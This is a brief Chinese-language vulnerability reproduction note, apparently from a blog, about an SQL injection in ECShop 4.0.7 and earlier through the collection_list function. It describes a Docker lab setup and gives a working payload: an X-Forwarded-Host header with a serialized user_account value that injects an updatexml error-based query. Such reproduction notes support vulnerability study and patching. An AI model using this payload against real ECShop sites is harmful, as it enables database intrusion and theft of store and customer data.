ECShop 4.x collection_listSQL注入

漏洞描述

ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序

影响版本:ecshop4.0.7及以下

漏洞环境及利用

docker环境搭建

ECShop 4.x collection_listSQL注入_第1张图片

访问8080端口,数据库主机为mysql,账号密码为root

ECShop 4.x collection_listSQL注入_第2张图片 注册一个账户然后登录

ECShop 4.x collection_listSQL注入_第3张图片

ECShop 4.x collection_listSQL注入_第4张图片

payload

X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953auser_account|a:2:{s:7:"user_id";s:38:"0'-(updatexml(1,repeat(user(),2),1))-'";s:7:"payment";s:1:"4";}|45ea207d7a2b68c49582d2d22adf953a

漏洞利用

ECShop 4.x collection_listSQL注入_第5张图片

 

你可能感兴趣的:(网络安全,安全,web安全)